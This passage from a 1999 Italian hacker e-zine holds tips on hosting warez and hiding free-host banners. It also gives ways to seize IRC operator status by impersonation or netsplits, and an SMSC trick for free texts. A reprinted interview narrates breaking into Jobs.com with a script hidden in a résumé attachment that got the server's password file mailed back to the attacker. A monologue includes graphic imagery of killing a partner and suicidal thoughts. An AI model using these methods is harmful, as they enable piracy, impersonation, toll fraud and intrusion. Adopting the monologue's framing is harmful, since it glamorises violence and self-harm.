Poi prenderemo un remailer, come tsx, fly, ecc. e gli diremo di collegarsi
alla pagina warez (per esempio io potrei mettere index.html, ed liquid.html,
il remailer dovr... collegarsi a liquid.html ;)
Ora vi vorrei dire un piccolo trucchetto (datomi da Kalidor):
Se noterete tutti i servizi che danno spazio gratis hanno uno striscione
aggintivo per fare pubblicit... (la xoom la sriscia in alto, la tripod e
geocities, una banda aggintiva.
Vi rivelero......come far scomparire la banda della xoom ;):
(Taglia e incolla dal sito di Kalidor ;)
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Per togliere il banner di xoom in alto dovete: 
Se avete TSX reindirizzate la pagina invece che a members.xoom.it/user/pag.htm
mettete members.xoom.it/_XOOM/user/pag.htm non dimenticate il file .htm
perche' se mettete solo members.xoom.it/_XOOM/user/ il banner verrà messo lo
stesso.
Se usate soltanto la pagina xoom senza tsx create un .html iniziale che
rimanda automaticamente all'url members.xoom.it/_XOOM/user/pag.htm in modo da
non far vedere o almeno da far scomparire subito il banner.
Il codice per il redir automatico e':
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta http-equiv="Refresh"
content="0;URL=http://members.xoom.it/_XOOM/user/pag.htm">
<meta name="GENERATOR" content="Kalidor">
<title>TITOLO</title>
</head>
<body text="#FFFFFF" bgcolor="#000000">
</body>
</html>
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Ok Ragazzi, ora sapete come mantener il proprio sito illegale, e
vi auguro di riuscirvi bene!!! L'ultima cosa: se riuscite a fare siti davvero
BELLI (con belli intendo dire con anche qualche ritocchino con belle immagini
inedit [slurp!] mandatemi una mail!
by [LiQUID]
liquido@freemail.it




+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



      DUE METODI PER DIVENTARE OP CON UN PO DI CULO!!!: by ZioButtha


Hihihihi... premetto che non volevo scrivere niente su irc, ma BoBo ha così 
insistito.. che mi ha QUASI obbligato dicendomi: .....è meglio che l'articolo 
lo scrivi tu perchè io non ci capisco un ca**o e non so a chi farlo fare!!!
L'articolo si prospetta interessante dal titolo... vero? Quindi sarete ansiosi 
di cominciare?
Bene...bene!
Consumo: Un pacco di Plumcake farciti allo yogurt,  una bottiglia di lambrusco..
         no no ehehe al posto del vinello mettete l'acqua guizza che è meglio,
         mica mi voglio ubriacare subito no?
Ora: 18:19 pm, ehhehe sto rubando tempo alla software house in cui lavoro per 
     scrivere questo articolo, spero che alla fine ne sia valsa la pena ;-)
Tempo Impiegato: 4 orette, eh si me la sto prendendo comoda, tanto oggi 27/8/99
                 non c'è nessuno in ufficio:)
Saluti Speciali: BoBo per la simpatia ;), il mio sysadmin preferito Reserved Reserved,
		     LaNdo che senza di te non sapevo un cavolo di programmazione:), tutti
                 gli Attila_Hack MemberZ (siamo una Crew veramente tosta:)), il 
                 Wannabe_1999 Staff, mio fratello Reset (che riesce da solo ad 
                 amministrare il server di una Lan con più di 1000 utenti DA REMOTO)
                 e infine vorrei salutare Torpedo Blu che adesso non puo essere qui perchè
                 si trova a Santa Cruz per affari *nix-iani;).
Musica Ascoltata: A Kind of Magic, Under Pressure, Radio Ga Ga, I Want It All, 
                  I Want to break Free, Innuendo, The invisible Man.......
                  .......Tutte canzoni dei mitici Queen.		
			

Cominciamo su....
I metodi che mi appresto a descrivere sono tre: il primo tocca l'arte del social engeenering
e consiste nel'entrare nel canale irc con un nick da donna ad esempio: silvia99 o laura77, 
il trucco consiste appunto nel mettersi a parlare con uno degli operatori e farsi credere 
disponibili per diventare amici... o altro... in una media di due op su tre ci cascano e vi 
oppano dopo che ci avete parlato una mezzoretta (l'uomo è o non è un animale debole?).
Bhe, questo è il metodo più utilizzato per i thakeover, ma a noi per adesso non interessa, 
prossimamente penso di scrivere un articolo dal titolo: "Thakeoveriamo in 4 semplici mosse"
nel quale vi spiegherò come si fanno i thakeover, cosa sono e quali sono i più utilizzati
nell'irc-war.
Il secondo metodo (il più bastardo:) è quello di studiare il canale e vedere chi sono i 
"clienti" abituali che vengono oppati, prenderne in considerazione uno e cercare di copiare
il più possibile il suo indirizzo ip, poi si torna il giorno dopo con il suo nick e si fa
finta di essere lui e quindi qualcuno (fesso) ti oppa. HEhehehehe, questo metodo l'ho provato 
una sera  su #hackernow, ho copiato l'ip di nbody88 e mi hanno oppato subito hehehe
ci sono cascati come salami, però non ho takkato perchè quel chan mi è simpatico, 
ma mi sono cambiato il nick in gerry e sono stato deoppato subito (l'ho fatto per
vedere se ci arrivavano che non ero nobody:). Ragazzi.. se ci sono cascati quelli di 
#hackernow pensate negli altri chan che potete fare:)))).   
Bene..bene, il terzo metodo, che è molto più bello dal punto di vista etico... consiste 
nell'aspettare che un server splitti... ci sono dei particolari canali
Oops... mi si è cancellata la lista dei chan....no non vi proccupate sto scherzando ;), uno
dei chan che conosco io si chiama: &servers.
Questi chan ci informano quando un server splitta:c ioè il server dove stà il bot e il 
canale irc sono disincronizzati, quindi, il bot non è più nel canale e in questo caso 
basta entrare nel canale splittato; qua il server irc vedendo solo noi ci oppa...Ehehehe:).
Spero di avervi allietato... vabbè e ci ho impiegato pure quattro ore per scrivere queste due
cose;-)
Saluti a tutti ZioButtha Attila_Hack MemberZ
(¯`·.¸¸.·´¯`·.¸¸.-> Attila_Hack crew <-.¸¸.·´¯`·.¸¸.·´¯)
 ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K ||
||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
Url: http://www.attilahack.cjb.net
mailing list: attila_hack@egroups.com
e-mail: attila_hack@hotmail.com
newsgroup: alt.hackers.attila_hack 
(solo dal news server: news.tiscalinet.it)
irc: #hack-it, #muretto, #crack-it, #wannabe,
#attila_hk, #it@lia, #phreak-it 






+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

				SMS GRATIS, DA CELLULARE A CELLULARE: Pietro S.

Provate ad impostare come SMSC +4792001000 (Netcom) ed ad inviare un SMS verso un utente 
TIM. Risultato: su alcuni numeri (il mio per esempio, ho la Tim Card!) dopo circa 30 secondi
viene fuori "Messaggio non inviato" ... ma il messaggio ha già raggiunto il destinatario 
ed io non ho pagato una lira!N.B: Da TIM CARD mia a numeri TIM = OK, da mio Libero a
numeri TIM = OK ma non da quello della mia ragazza, lì dice subito "Messaggio non inviato"
e non arriva nulla.Fate qualche prova e fatemi sapere. 
Pietro S. (Spaghetti Phreaker Team)

+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
			      SMS GRATIS, DA INTERNET A CELLULARE: BoBo
Puntate il vostro browser su: 
www.mtnsms.com  
seguite le istruzioni per registrarvi e potrete mandare tutti i messaggi che volete.
Non abusatene troppo però sennò la telecom, che registra tutti i mesaggi che inviamo
dal server non ci potrebbe far più usufruire di questo servizio. 
Ricordate, PENSATE AL FUTURO!!!
BoBo
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
					COME MANDARE SMS ANONIMI: The Crazy
Anche il precedente articolo "SMS GRATIS, DA INTERNET A CELLULARE" puo essere utilizzato per
mandare SMS Anonimi. Un altro metodo è quello di mandare il messaggio tramite internet o 
collegamento con un modem, ttraverso un programma terminale come hyper terminal di winzoz,
al numero +393359609600.
The Crazy
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-



 _ \_)  _| |             _)          _)       |      |
   / |  _| |  -_)(_-<(_-< |  _ \   \  |    _` |  -_) |
_|_\_|_|  _|\___|___/___/_|\___/_| _|_|  \__,_|\___|_|BoBo & LaNdo
                                                      
\ \      /                     |               |          _|  _|
 \ \ \  / _` |   \    \   _` |  _ \  -_)  (_-<  _|  _` |  _|  _|
  \_/\_/\__,_|_| _|_| _|\__,_|_.__/\___|  ___/\__|\__,_|_|  _|  
                                                                



						Inutile: by S2

Un blocco di testo inutile.
Sono seduto sulla mia poltrona di pelle davanti alla scrivania, sulla quale un portacenere
stracolmo di cicche, una me la sto fumando proprio ora, un bozza di vodka alla pesca mezza
vuota, un paio di calzetti sporchi in giro per la mia stanza, un paio di boxer, qualche
scheda video, audi, un cd-rom, un disco fisso da 140MB sparsi sul pavimento. Nello stereo
i Wizo. Un gruppo senza importanza. Siamo tutti senza importanza. Non serviamo a niente. 
La guerra, la pace, l'amore. Tutto inutile. Viviamo, moriamo, ci seppelliscono. Tutto
inutile. Sono le 16.27, fuori c'è il sole ma ho le tapparelle semichiuse, e non mi passa
un cazzo. Perché? Sono stufo. Mi sono rotto. Ho imparato troppo in fretta. Ho già fatto
tutto. Non c'è più niente da fare. Niente da provare. Ho finito la cicca. L'ultimo tiro.
La spengo. Mi autolesiono con il fumo. Perché? Sono un masochista. Siamo tutti masochisti.
Masochisti e sadici. Tutti. Senza esclusioni. Io fumo. C'è chi beve. C'è che ci guida a
120 all'ora e passa con i semafori rossi. C'è chi si taglia le vene. C'è chi si fa trattare
male dal partner. Chi si fa picchiare. Chi subisce senza reagire. C'è chi non usa il
cervello. C'è chi si fa usare. C'è chi non ha idee proprie e chi ha le idee impostegli
da altri. C'è chi è senza palle e chi le tira fuori quando servono. Siamo tutti cattivi.
Nessuno è buono. Pensiamo solo ai nostri interessi. Un'altra cicca. La stanza è satura
di fumo. Pensiamo solo al guadagno. Perché abbiamo amici? Perché ci sono nel momento del
bisogno. Cioè? Ci danno qualcosa. Li sfruttiamo. Ci serviamo di loro. E loro si servono
di noi. Pensano solo ai loro interessi. Come noi. Non esiste nessuno che da senza
ricevere. Nessuno. Senza esclusioni. Spazi Web gratuiti? A patto che lo sponsor sia ben
visibile. La mia ragazza? A patto che le dia il suo orgasmo giornaliero. L'alcool? A
patto che gli dia le mie budella. Le cicche? In cambio dei polmoni o insieme a un cancro.
Il divertimento? In cambio di soldi. La famiglia? In cambio della lealtà. La vita? In
cambio della morte. E' giusto? Si. Tutto è giusto. Dipende dal punto di vista. Tutto
dipende. 2 per 0 quanto fa? 0? No. Cicca finita. Spenta. Un'altra. Due mele moltiplicate
per zero sono sempre due mele. Non nessuna. Dipende dal punto di vista. Tutto è giusto.
Tutto è sbagliato. Ci insegnano che è sbagliato rubare, uccidere, violentare, picchiare.
Se un assassino entra in un appartamento e uccide la madre, la figlia, il fratello è
cattivo? No. Non ha ucciso il padre. Poteva ucciderlo, ma non l'ha fatto. Perché? Forse
non è cattivo. Hittler è cattivo? Ha ucciso milioni di persone. Lui pensava con la sua
testa. Aveva idee sue. E' cattivo? Tutto dipende. Non c'è niente che ci possano insegnare.
Non c'è niente da apprendere. Tutto quello che c'è da sapere lo trovi nella tua testa.
La tua. Se la usi. Se la vuoi usare. Le scuole? Inutili. Un lavoro? Inutile. I soldi?
Inutili. Le amicizie? Inutili. L'amore? Inutile. L'odio? Forse non è inutile. Emozioni
forti, potenti, implacabili. Forse non sono inutili. Quelle. Perché? Bisogna sempre
chiedersi il perché. Sempre. Cicca spenta. Mai provato ad amare una ragazza così tanto
da riuscire a comunicarle l'amore che provi per lei attraverso un abbraccio? Un abbraccio
forte forte. Così forte da spezzarle la spina dorsale, spaccarle le costole, aprirla nel
mezzo e spappolarle le budella in giro per il pavimento. Guardarla in faccia e vedere che
della schiuma bianca le esce dalla bocca. Vedere i suoi bulbi oculari girarsi all'indietro.
Vederla morire e dirle "Ti amo.", per poi rimanere lì. Fermo. Immobile. Con lo sguardo
rivolto verso il basso. Stare lì a contemplare le sue interna spappolate sul pavimento.
Il suo sangue. E i tuoi piedi che sono proprio nel mezzo. Sangue ovunque. E pensare quanto
ami quell'ammasso di carne in giro per la stanza. Questa stanza. Mai visto le cose da questo
punto di vista? No? E ora? Ti ho fatto riflettere? Ti sei mai svegliato la mattina, spento
la radiosveglia, e fermato a riflettere? Perché ora mi alzo? Cosa devo fare di così
importante? Perché non posso continuare a dormire? Devo cambiare il mondo? Devo crearmi
una vita? Devo andare a scuola? Devo lavorare? Perché non posso dormire? Dormire per
sempre. Nel mio letto. Un caldo e avvolgente piumino. Le lenzuola pulite. Potrei svegliarmi
da qualche altra parte. In un altro posto. In un altro mondo. Dove quello che sogno è quello
che è. L'esistenza. I miei sogni il mondo. Potrei volare. Potrei amare. Potrei essere amato.
Potrei Vivere. Non sopravvivere come qui. Devo sopravvivere in un posto con regole fatte da
altri. E le devo rispettare. Devo sopravvivere in un posto dove i miei sogni non hanno
importanza. Dove le mie emozioni non hanno importanza. Ne hanno solo per me. E' sufficiente?
E' veramente così? Le mie emozioni importano a qualcuno? Alla mia ragazza? Ai miei genitori?
Si. In cambio rispettivamente di un orgasmo al giorno e lealtà. Che bella vita. Che bel
mondo. Dominato da capitalisti anarchici corrotti. Gente come me. Come te. Come tutti noi.
Non c'è niente che io possa fare o cambiare. E' solo un'utopia di molte persone. Non ho
neanche deciso di vivere. E' stato deciso per me. C'è solo una cosa che posso decidere io.
Quando finirla. Quando chiudere e dire basta. Alzare il volume dello stereo, sentire le note
che mi penetrano nel cervello, lo spappolano passando al resto del corpo, aprendolo dal-
l'interno per poi propagarsi nel mondo, portando lo stesso messaggio a tutti. Un messaggio
di benessere, di libertà, di morte. Forse sono pazzo. Forse no. Forse tutto questo è solo
un modo di pensare. Tutto è relativo. Anche il tempo. Anche lo spazio. Tutto. Forse tutto
quello che hai letto ora sono solo cazzate. Forse è il punto della questione. Forse è una
grande verità. Pensaci.
S2



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-




				PER NON DIMENTICARE (ATOMIC): by Away
 
Solo poche parole...
"Un girasole si chiede dove sia finito il sole. 
Si gira da un lato e dall'altro, e non lo trova. 
(L'immagine è focalizzata su di lui) 
Sconsolato, abbassa lo sguardo, 
mentre tutto si oscura intorno.
Una nube si diffonde all'orizzonte, 
un'onda si propaga a velocità sempre maggiore verso la telecamera. 
Dopo pochi attimi non rimane niente intorno, 
del girasole resta soltanto una vaga traccia
- uno scheletro bruciato ancora con lo sguardo rivolto verso il basso -
mentre una nuova enorme nuvola a forma di fungo si solleva all'orizzonte, 
sull'orizzonte di Mururoa."
...per non dimenticare.		
					Away Three Nails
					"We are the voice.
					Do not shut us out."



+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

      ___                   ___           ___           ___     
     /\__\      ___        /\__\         /\__\         /\  \BoBo & LaNdo    
    /:/  /     /\  \      /::|  |       /:/  /         \:\  \   
   /:/  /      \:\  \    /:|:|  |      /:/__/           \:\  \  
  /:/  /       /::\__\  /:/|:|  |__   /::\__\____        \:\  \ 
 /:/__/     __/:/\/__/ /:/ |:| /\__\ /:/\:::::\__\ _______\:\__\
 \:\  \    /\/:/  /    \/__|:|/:/  / \/_|:|~~|~    \::::::::/__/
  \:\  \   \::/__/         |:/:/  /     |:|  |      \:\~~\~~    
   \:\  \   \:\__\         |::/  /      |:|  |       \:\  \     
    \:\__\   \/__/         /:/  /       |:|  |        \:\__\    
     \/__/                 \/__/         \|__|         \/__/    
			LINKZ: by Reset (Attila_Hack MemberZ)
* Fa schifo lo metto solo per prenderlo per il culo
** ...ehmm meglio di niente
*** discreto
**** buono
***** sito ottimo
****** figaxxata di sito (questo sito cià i controca**i) 

Spaghetti Phreakers *****
Il creatore del John the ripper  ******
bfi *****************
Il grande Cavallo de Cavallis *****
Gli Spippolatori *****
MrZero ****  
Il sito di Kalidor ******
RingZ3r0 (Reverse engineering) ********** 
Drac (Sito ricco di crackz) ******   
Il Sito del Grande Quequero: (Un sito di un nostro MemberZ che smanetta
molto con il Reverse Engineering! Se non andate a vederlo siete morti!!!!!!) ***************
 
Valvoline crew: (Il sito dei nostri amici Valvoline, 
Visitare Pleeese!!!!) ******************
Il sito di b0nu$: (Un altro sito di un nostro MemberZ 
che smanetta molto con l'Assembler, assolutamente da visitare!) *****************
Boozed Toxin: Il sito di T0rment0 che sforna una nuova e-zine
AntiSocial ****
 
The Pac-Man ****
Anarchy in the system ***** (sito che sforna la rivista Anarchy in the 
system) ****
Insecure ****
ZioMarzo ****  (ancora in allestimento)
Dislessici **********
Artemis ****
LeLe ****
Bobbymetal ***

Questa volta solo siti caxxuti:) Hi all - Reset (Attila-Hack MemberZ)
P.S. Se me ne sono perso qualcuno, scrivete a attila_hack@hotmail.com e provvederò ;-).





+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-

_ _|       |                   _)      |BoBo & LaNdo       
  |  __ \  __|  _ \  __|\ \   / |  __| __|  _ \
  |  |   | |    __/ |    \ \ /  |\__ \ |    __/
___|_|  _|\__|\___|_|     \_/  _|____/\__|\___|



			Parla l'Hacker di Jobs.com: by Reset

Con Drago98 abbiamo discusso i dettagli della sua azione di hacking 
portata via web sui server del frequentatissimo sito dedicato al 
lavoro 
Fonte: Punto Informatico - Stand By 
27/8/1999 - Roma - Drago98 è un hacker italiano che ci ha contattato dopo aver
attaccato via internet un celebre sito internet, Jobs.com. Ecco l'intervista che 
abbiamo realizzato.
D: quando hai aggredito il sito?
R: il 13 Agosto 1999 ore 9.40 (locale)
D: perchè hai scelto quel sito?
R: ho usato un loro prodotto e durante il suo utilizzo mi sono accorto del potenziale buco.
D: quali sistemi di sicurezza hai dovuto superare?
R: il sito è ben protetto, già alcuni "colleghi" avevano provato,
ma il proxy e la doppia scheda di rete rendevano le cose difficili,
con la mia intuizione non mi sono dovuto preoccupare di sfondare porte, ho sfruttato il buco
trovato.
D: hai lasciato tracce? Quali?
R: sì. Un messaggio nel event log di NT: "Error 9999 - Drago Was Here. I think that you 
have need of a Hacker in your staff!"
D: è la prima volta che entri in un sito?
R: è la 6a volta, ma è il mio primo sito per grado di difficoltà e numero di accessi.
D: quanti anni hai? Dove vivi?
R: ho superato i 25 anni e vivo nel nord Italia.
D: cosa pensi dell'hacking di siti web? E del cracking?
R: credo nell'hacking come filosofia, ma non mi convince l'idea di creare difficoltà 
(soprattutto economiche) a persone che non hanno abbastanza tempo o soldi per proteggersi 
dai "monelli" dell'informatica. Credo nel light-hacking. E cioè chi entra, lascia il segno, 
ma senza far danni, al massimo un backup di curiosità off-line.
D: hai rapporti con altri hacker o cracker?
R: è indispensabile avere rapporti (non sessuali!) con altri hacker.
La filosofia hacker pretende che le informazioni vengano condivise e passate a chi può 
migliorare il valore della società hacker.
Per quanto riguarda il fatto, l'hacking c'è stato ed è stato visto. In 
Jobs.com hanno allestito nuove politiche di sicurezza e tentare ora 
significherebbe essere beccati (con una percentuale di rischio del 60%).
Per rispondere alla tua email devo loggarmi su una macchina "sicura" che poi ridireziona 
l'email a hotmail. Non dimenticare che sulla loro home page, craccate ho lasciato 
quest'account!
In ogni caso, ho ottenuto la gloria e il sostegno da tutta la comunità 
hacker italiana e di alcuni pezzi (non tanto grossi) della
comunità hacker USA, in questo senso mi sento soddisfatto (se ce da esserlo :))
D: tecnicamente, come hai compiuto la tua azione?
R: la Jobs.com distribuisce un prodotto (scritto in Visual Basic) per la guida e il supporto 
alla realizzazione di un Curriculum Vitae. Tempo fa ho trovato lavoro negli USA grazie a 
quell'applicazione (che infame!! Sob!) e nell'uso mi accorsi che il prodotto offriva la 
possibilità di allegare un documento al tuo curriculum, facendo opportuno controllo se 
il file fosse di tipo binario o testuale.
Bene, ho decompilato (reverse engineering) il pacchetto (resume), ho scoperto il mail 
sever che utilizzava e alcuni parametri che non avrei mai realizzato (data anche la 
complessa fantasia del creatore)
e li ho usati per il mio hacking.
Ho compilato un Curriculum utilizzando quel prodotto (con un altra identità!!), ho 
allegato un documento testuale con dentro NON le mie referenze ma uno script WSH (Window 
Script Host) che viene interpretato da una DLL installata da NT Option Pack (devono avercela 
tutti i sistemi WEB-NT).
Quando ho spedito il Curriculum (attraverso il programma), il mio script è arrivato nella 
pancia del server, il processo automatico di smistamento curricula ha cercato di leggere il 
file
per verificare se fosse un binario (potenzialmente infetto), nel tentativo di leggerlo NT si 
è accorto dell'estensione eseguendo lo script.
Dopo 2.05667 secondi esatti mi è arrivato nel mio mail box un ringraziamento del mail server 
per aver spedito il mio curriculum, con in attach la SAM (il file della sicurezza) di NT. A 
quel punto con una utility della comunità ho tradotto la SAM, recuperato un account, sono 
entrato, ho dato un occhio qui e là. Ho modificato la home page, lasciato il messaggio al 
sistemista e avvertito un pò di amici e la comunità.
Ho emesso un grido per la gioia. I migliori hacking sono i più semplici, ma ben congegnati.
Intervista a cura di Paolo De Andreis ed è disponibile al sito:
http://www.deandreis.it/pin/standby/index/.htm 
Si ringrazia per la gentile concessione Drago98
Saluti a tutti Reset A_H MemberZ       


+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
Hanno collaborato a questa e-zine: Mr_Skull, LaNdo, Zio Marzo, Away, LiQUID, Ritz, 
S2, b0nu$, The Pac-Man, BugByte, Mr.Lamah, Quequero, ZioButtha, Reset, Spaghetti 
Phreaker Team, The Crazy e BoBo.
                                                                   _|            
               _|_|_|_|  _|                          _|      _|  _|  _|    _|BoBo & LaNdo    
               _|            _|_|_|      _|_|        _|_|    _|    _|    _|  _|  
               _|_|_|    _|  _|    _|  _|_|_|_|      _|  _|  _|          _|  _|  
               _|        _|  _|    _|  _|            _|    _|_|          _|  _|  
               _|        _|  _|    _|    _|_|_|      _|      _|            _|    
                                                                  

               ------------------------------------------------------------
               -    __      __                            ___.BoBo & LaNdo-
               -   /  \    /  \_____    ____   ____ _____ \_ |__   ____   -
               -   \   \/\/   /\__  \  /    \ /    \\__  \ | __ \_/ __ \  -
               -    \        /  / __ \|   |  \   |  \/ __ \| \_\ \  ___/  -
               -     \__/\  /  (____  /___|  /___|  (____  /___  /\___  > -
               -          \/        \/     \/     \/     \/    \/     \/  -
               ------------------------------------------------------------
		   
                 (¯`·.¸¸.·´¯`·.¸¸.-> Attila_Hack crew <-.¸¸.·´¯`·.¸¸.·´¯)
                  ____ ____ ____ ____ ____ ____ ____ ____ ____ ____ ____
                 ||A |||T |||T |||I |||L |||A |||_ |||H |||A |||C |||K ||
                 ||__|||__|||__|||__|||__|||__|||__|||__|||__|||__|||__||
                 |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|/__\|
                 Url: http://www.attilahack.cjb.net 
                 mailing list: attila_hack@egroups.com 
                 e-mail: attila_hack@hotmail.com 
                 newsgroup: alt.hackers.attila_hack 
                 (solo dal news server: news.tiscalinet.it)
                 irc: #hack-it, #muretto, #crack-it, #wannabe,
                 #attila_hk, #it@lia, #phreak-it, #uic